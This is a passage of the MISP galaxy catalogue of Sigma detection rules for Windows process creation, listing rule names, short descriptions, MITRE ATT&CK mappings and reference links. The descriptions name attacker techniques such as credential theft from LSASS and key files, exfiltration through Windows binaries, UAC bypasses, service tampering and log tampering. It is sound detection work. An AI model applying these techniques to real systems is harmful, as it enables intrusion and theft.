Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.

The tag is: misp-galaxy:sigma-rules="Dynamic .NET Compilation Via Csc.EXE"

Dynamic .NET Compilation Via Csc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 10640. Table References

Links

https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/

https://twitter.com/gN3mes1s/status/1206874118282448897

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/

https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml

SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs

The tag is: misp-galaxy:sigma-rules="SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code"

SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10641. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml

Execution via stordiag.exe

Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe

The tag is: misp-galaxy:sigma-rules="Execution via stordiag.exe"

Execution via stordiag.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10642. Table References

Links

https://twitter.com/eral4m/status/1451112385041911809

https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml

PUA - NirCmd Execution As LOCAL SYSTEM

Detects the use of NirCmd tool for command execution as SYSTEM user

The tag is: misp-galaxy:sigma-rules="PUA - NirCmd Execution As LOCAL SYSTEM"

PUA - NirCmd Execution As LOCAL SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10643. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://www.nirsoft.net/utils/nircmd2.html#using

https://www.nirsoft.net/utils/nircmd.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml

Application Removed Via Wmic.EXE

Uninstall an application with wmic

The tag is: misp-galaxy:sigma-rules="Application Removed Via Wmic.EXE"

Application Removed Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10644. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_application.yml

Private Keys Reconnaissance Via CommandLine Tools

Adversaries may search for private key certificate files on compromised systems for insecurely stored credential

The tag is: misp-galaxy:sigma-rules="Private Keys Reconnaissance Via CommandLine Tools"

Private Keys Reconnaissance Via CommandLine Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 10645. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_private_keys_recon.yml

Changing Existing Service ImagePath Value Via Reg.EXE

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services

The tag is: misp-galaxy:sigma-rules="Changing Existing Service ImagePath Value Via Reg.EXE"

Changing Existing Service ImagePath Value Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10646. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml

Potentially Suspicious Child Process Of ClickOnce Application

Detects potentially suspicious child processes of a ClickOnce deployment application

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Child Process Of ClickOnce Application"

Table 10647. Table References

Links

https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml

Suspicious ConfigSecurityPolicy Execution

Upload file, credentials or data exfiltration with Binary part of Windows Defender

The tag is: misp-galaxy:sigma-rules="Suspicious ConfigSecurityPolicy Execution"

Suspicious ConfigSecurityPolicy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

Table 10648. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml

Audit Policy Tampering Via NT Resource Kit Auditpol

Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

The tag is: misp-galaxy:sigma-rules="Audit Policy Tampering Via NT Resource Kit Auditpol"

Audit Policy Tampering Via NT Resource Kit Auditpol has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10649. Table References

Links

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml

Bypass UAC via Fodhelper.exe

Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.

The tag is: misp-galaxy:sigma-rules="Bypass UAC via Fodhelper.exe"

Bypass UAC via Fodhelper.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10650. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml

Application Whitelisting Bypass via Dnx.exe

Execute C# code located in the consoleapp folder

The tag is: misp-galaxy:sigma-rules="Application Whitelisting Bypass via Dnx.exe"

Application Whitelisting Bypass via Dnx.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 10651. Table References

Links

https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml

Windows Kernel Debugger Execution

Detects execution of the Windows Kernel Debugger "kd.exe".

The tag is: misp-galaxy:sigma-rules="Windows Kernel Debugger Execution"

Table 10652. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_kd_execution.yml

Potential Dosfuscation Activity

Detects possible payload obfuscation via the commandline

The tag is: misp-galaxy:sigma-rules="Potential Dosfuscation Activity"

Potential Dosfuscation Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10653. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf

https://github.com/danielbohannon/Invoke-DOSfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml

Suspicious Calculator Usage

Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.

The tag is: misp-galaxy:sigma-rules="Suspicious Calculator Usage"

Suspicious Calculator Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10654. Table References

Links

https://twitter.com/ItsReallyNick/status/1094080242686312448

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_calc_uncommon_exec.yml

Potential ReflectDebugger Content Execution Via WerFault.EXE

Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow

The tag is: misp-galaxy:sigma-rules="Potential ReflectDebugger Content Execution Via WerFault.EXE"

Potential ReflectDebugger Content Execution Via WerFault.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10655. Table References

Links

https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html

https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml

Potential Encoded PowerShell Patterns In CommandLine

Detects specific combinations of encoding methods in PowerShell via the commandline

The tag is: misp-galaxy:sigma-rules="Potential Encoded PowerShell Patterns In CommandLine"

Potential Encoded PowerShell Patterns In CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10656. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encoding_patterns.yml

Dropping Of Password Filter DLL

Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS

The tag is: misp-galaxy:sigma-rules="Dropping Of Password Filter DLL"

Dropping Of Password Filter DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"

Table 10657. Table References

Links

https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter

https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml

System Network Connections Discovery Via Net.EXE

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

The tag is: misp-galaxy:sigma-rules="System Network Connections Discovery Via Net.EXE"

System Network Connections Discovery Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 10658. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_network_connections_discovery.yml

Potential ShellDispatch.DLL Functionality Abuse

Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"

The tag is: misp-galaxy:sigma-rules="Potential ShellDispatch.DLL Functionality Abuse"

Table 10659. Table References

Links

https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml

Start Windows Service Via Net.EXE

Detects the usage of the "net.exe" command to start a service using the "start" flag

The tag is: misp-galaxy:sigma-rules="Start Windows Service Via Net.EXE"

Start Windows Service Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10661. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_start_service.yml

Enumerate All Information With Whoami.EXE

Detects the execution of "whoami.exe" with the "/all" flag

The tag is: misp-galaxy:sigma-rules="Enumerate All Information With Whoami.EXE"

Enumerate All Information With Whoami.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10662. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml

Psexec Execution

Detects user accept agreement execution in psexec commandline

The tag is: misp-galaxy:sigma-rules="Psexec Execution"

Psexec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Services - T1569" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 10664. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_execution.yml

Suspicious RASdial Activity

Detects suspicious process related to rasdial.exe

The tag is: misp-galaxy:sigma-rules="Suspicious RASdial Activity"

Suspicious RASdial Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10665. Table References

Links

https://twitter.com/subTee/status/891298217907830785

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rasdial_execution.yml

Suspicious New Service Creation

Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths

The tag is: misp-galaxy:sigma-rules="Suspicious New Service Creation"

Suspicious New Service Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10666. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml

Exchange PowerShell Snap-Ins Usage

Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27

The tag is: misp-galaxy:sigma-rules="Exchange PowerShell Snap-Ins Usage"

Exchange PowerShell Snap-Ins Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

Table 10667. Table References

Links

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

https://www.intrinsec.com/apt27-analysis/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml

Potential Persistence Attempt Via Existing Service Tampering

Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Attempt Via Existing Service Tampering"

Potential Persistence Attempt Via Existing Service Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10668. Table References

Links

https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml

UAC Bypass Using DismHost

Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using DismHost"

UAC Bypass Using DismHost has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10669. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml

Compressed File Creation Via Tar.EXE

Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.

The tag is: misp-galaxy:sigma-rules="Compressed File Creation Via Tar.EXE"

Compressed File Creation Via Tar.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10670. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

https://lolbas-project.github.io/lolbas/Binaries/Tar/

https://unit42.paloaltonetworks.com/chromeloader-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_compression.yml

Suspicious File Download From IP Via Wget.EXE - Paths

Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe

The tag is: misp-galaxy:sigma-rules="Suspicious File Download From IP Via Wget.EXE - Paths"

Table 10671. Table References

Links

https://www.gnu.org/software/wget/manual/wget.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml

Detects suspicious Plink tunnel port forwarding to a local port

The tag is: misp-galaxy:sigma-rules="Suspicious Plink Port Forwarding"

Suspicious Plink Port Forwarding has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 10672. Table References

Links

https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d

https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml

Write Protect For Storage Disabled

Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.

The tag is: misp-galaxy:sigma-rules="Write Protect For Storage Disabled"

Write Protect For Storage Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 10673. Table References

Links

https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml

Renamed Visual Studio Code Tunnel Execution

Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel

The tag is: misp-galaxy:sigma-rules="Renamed Visual Studio Code Tunnel Execution"

Renamed Visual Studio Code Tunnel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10674. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://code.visualstudio.com/docs/remote/tunnels

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml

Verclsid.exe Runs COM Object

Detects when verclsid.exe is used to run COM object via GUID

The tag is: misp-galaxy:sigma-rules="Verclsid.exe Runs COM Object"

Verclsid.exe Runs COM Object has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10675. Table References

Links

https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5

https://lolbas-project.github.io/lolbas/Binaries/Verclsid/

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml

Potentially Suspicious Regsvr32 HTTP IP Pattern

Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Regsvr32 HTTP IP Pattern"

Potentially Suspicious Regsvr32 HTTP IP Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10676. Table References

Links

https://twitter.com/tccontre18/status/1480950986650832903

https://twitter.com/mrd0x/status/1461041276514623491

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml

Potential Product Class Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall and antivirus products

The tag is: misp-galaxy:sigma-rules="Potential Product Class Reconnaissance Via Wmic.EXE"

Potential Product Class Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10677. Table References

Links

https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1

https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml

Potential Arbitrary File Download Using Office Application

Detects potential arbitrary file download using a Microsoft Office application

The tag is: misp-galaxy:sigma-rules="Potential Arbitrary File Download Using Office Application"

Potential Arbitrary File Download Using Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10678. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/

https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml

Suspicious DumpMinitool Execution

Detects suspicious ways to use the "DumpMinitool.exe" binary

The tag is: misp-galaxy:sigma-rules="Suspicious DumpMinitool Execution"

Suspicious DumpMinitool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10679. Table References

Links

https://twitter.com/mrd0x/status/1511489821247684615

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/

https://twitter.com/mrd0x/status/1511415432888131586

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml

Execution of Powershell Script in Public Folder

This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder

The tag is: misp-galaxy:sigma-rules="Execution of Powershell Script in Public Folder"

Execution of Powershell Script in Public Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10680. Table References

Links

https://www.mandiant.com/resources/evolution-of-fin7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml

Use Short Name Path in Image

Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection

The tag is: misp-galaxy:sigma-rules="Use Short Name Path in Image"

Use Short Name Path in Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10681. Table References

Links

https://twitter.com/frack113/status/1555830623633375232

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN

https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml

Fsutil Suspicious Invocation

Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).

The tag is: misp-galaxy:sigma-rules="Fsutil Suspicious Invocation"

Fsutil Suspicious Invocation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 10682. Table References

Links

https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md

https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt

https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_usage.yml

Insensitive Subfolder Search Via Findstr.EXE

Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.

The tag is: misp-galaxy:sigma-rules="Insensitive Subfolder Search Via Findstr.EXE"

Insensitive Subfolder Search Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10683. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Findstr/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_subfolder_search.yml

Execute Pcwrun.EXE To Leverage Follina

Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability

The tag is: misp-galaxy:sigma-rules="Execute Pcwrun.EXE To Leverage Follina"

Execute Pcwrun.EXE To Leverage Follina has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10684. Table References

Links

https://twitter.com/nas_bench/status/1535663791362519040

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml

Potential Reconnaissance Activity Via GatherNetworkInfo.VBS

